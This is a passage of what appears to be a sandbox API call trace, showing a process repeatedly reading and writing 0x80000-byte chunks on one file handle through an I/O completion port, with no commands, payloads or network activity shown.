lpOverlapped=0x41f0020) returned 1 [0140.859] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.861] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.862] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.862] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.880] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.881] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.883] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.883] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.884] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.886] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.887] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.887] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.911] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.913] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.914] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.915] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.916] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.917] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.919] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.919] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.936] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.938] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.939] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.939] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.940] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.942] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.943] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.943] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.971] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.973] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.973] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.974] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.976] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.988] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.988] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.006] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.008] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.009] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.009] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.010] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.012] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.013] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.013] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.031] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.032] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.033] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.035] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.036] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.038] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.038] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.059] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.061] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.062] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.062] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.064] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.065] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.066] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.066] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.084] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.086] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.087] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.087] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.089] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.090] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.091] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.091] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.112] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.113] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.115] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.115] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.116] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.118] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.119] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.119] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.129] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.130] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.131] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.133] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.135] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.136] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.136] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.145] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.147] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.148] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.148] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.155] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.166] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.167] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.167] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.185] 